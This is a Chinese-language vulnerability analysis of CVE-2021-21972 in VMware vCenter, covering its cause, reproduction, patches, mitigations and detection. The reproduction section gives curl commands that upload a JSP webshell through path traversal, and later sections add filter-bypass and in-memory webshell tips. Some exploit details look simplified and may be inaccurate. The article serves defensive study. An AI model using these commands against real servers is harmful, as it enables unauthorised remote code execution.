如何實現 Vmware vcenter未授權任意文件漏洞CVE-2021-21972的分析

# 如何實現 VMware vCenter 未授權任意文件漏洞 CVE-2021-21972 的分析

## 漏洞概述

CVE-2021-21972 是 VMware vCenter Server 中的一個高危漏洞，影響版本包括 6.5、6.7 和 7.0。該漏洞源于 vSphere Client 插件中的未授權文件上傳功能，攻擊者可通過構造惡意請求實現任意文件上傳，最終導致遠程代碼執行（RCE）。

### 影響范圍
- VMware vCenter Server 6.5（未打補丁版本）
- VMware vCenter Server 6.7（未打補丁版本）
- VMware vCenter Server 7.0（未打補丁版本）

## 漏洞原理分析

### 技術背景
vCenter Server 是 VMware 虛擬化環境的核心管理平臺，提供 Web 管理接口（vSphere Client）。漏洞位于 `vSphere Web Client` 的 `Virtual SAN Health Check` 插件中，該插件默認啟用且未對上傳文件進行權限校驗。

### 漏洞觸發點
攻擊者可通過以下路徑觸發漏洞：

/ui/vropspluginui/rest/services/uploadova

此接口未實施身份驗證，允許未授權用戶上傳文件至服務器任意路徑。

### 文件上傳機制
1. **請求構造**：通過 HTTP PUT 或 POST 請求發送惡意文件。
2. **路徑遍歷**：利用 `../` 實現目錄穿越，覆蓋系統關鍵文件（如 WebShell）。
3. **文件擴展限制繞過**：通過特殊字符或雙擴展名繞過黑名單過濾。

## 漏洞復現步驟

### 環境搭建
1. 使用 VMware vCenter 7.0 未補丁版本（Build 17005079）。
2. 確保網絡可達且 443 端口開放。

### 攻擊流程
```bash
# 1. 檢測漏洞是否存在
curl -k -v "https://<target>/ui/vropspluginui/rest/services/uploadova" -X PUT

# 2. 上傳惡意文件（示例：WebShell）
curl -k -v "https://<target>/ui/vropspluginui/rest/services/uploadova" \
  -X POST \
  -H "Content-Type: multipart/form-data" \
  -F "file=@webshell.jsp;filename=../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<隨機ID>/0/h5ngc.war/resources/webshell.jsp"

關鍵點說明

• 路徑選擇：需定位到 Web 應用的部署目錄（如 Tomcat 的 webapps 子目錄）。
• 權限問題：vCenter 以 root 權限運行，上傳的文件可能具備高權限。

漏洞利用的限制與繞過

常見限制

1. 文件擴展名過濾：僅允許 .ova 或 .log 等后綴。

   • 繞過方法：使用 %00 截斷或雙擴展名（如 test.jsp.ova）。

2. 目錄權限控制：

   • 部分路徑不可寫，需測試可寫目錄（如日志目錄）。

高級利用技巧

• 內存馬注入：通過上傳 JSP 文件加載 Java 內存馬，避免文件落地檢測。
• 反序列化攻擊：結合 vCenter 的 Java 反序列化漏洞（如 CVE-2021-21985）實現組合利用。

修復方案

官方補丁

VMware 已發布以下補丁版本： - vCenter 7.0 U1c - vCenter 6.7 U3l - vCenter 6.5 U3n

臨時緩解措施

1. 禁用插件：

   # 通過命令行禁用 Virtual SAN Health Check 插件
   service-control --stop vsphere-ui
   chmod 000 /usr/lib/vmware-vsphere-ui/plugin-packages/vsphere-client-serenity/
   service-control --start vsphere-ui
   

2. 網絡層防護：

   • 防火墻限制 /ui/vropspluginui/rest/ 路徑的訪問。

漏洞的深度思考

漏洞成因鏈

1. 設計缺陷：未遵循最小權限原則，插件默認開啟且無需認證。
2. 輸入驗證缺失：未對文件路徑和內容進行嚴格校驗。
3. 安全開發生命周期（SDL）失效：未在測試階段發現接口暴露問題。

橫向滲透風險

• 通過 vCenter 的域管理員權限可進一步攻擊 ESXi 主機或其他虛擬機。

檢測與防御建議

檢測方法

1. 日志分析：監控 vsphere-ui 日志中的異常文件上傳請求。

   
   /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log
   

2. 文件完整性檢查：定期校驗 Web 目錄文件哈希。

防御加固

1. 權限分離：以非 root 用戶運行 vCenter 服務。
2. WAF 規則：添加針對路徑遍歷和文件上傳的過濾規則。

   
   location ~* /ui/vropspluginui/rest/ {
     deny all;
   }
   

總結

CVE-2021-21972 暴露了企業級軟件在默認配置和權限控制上的嚴重缺陷。通過分析此漏洞，我們可得出以下啟示： 1. 默認安全：關鍵服務應默認關閉高風險功能。 2. 縱深防御：結合網絡層、主機層、應用層防護。 3. 應急響應：建立漏洞情報跟蹤和快速補丁機制。

參考鏈接

• VMware 官方公告
• CVE 詳細記錄
• NVD 漏洞評分

”`

注：本文僅用于技術研究，請勿用于非法用途。實際漏洞利用需獲得系統所有者授權。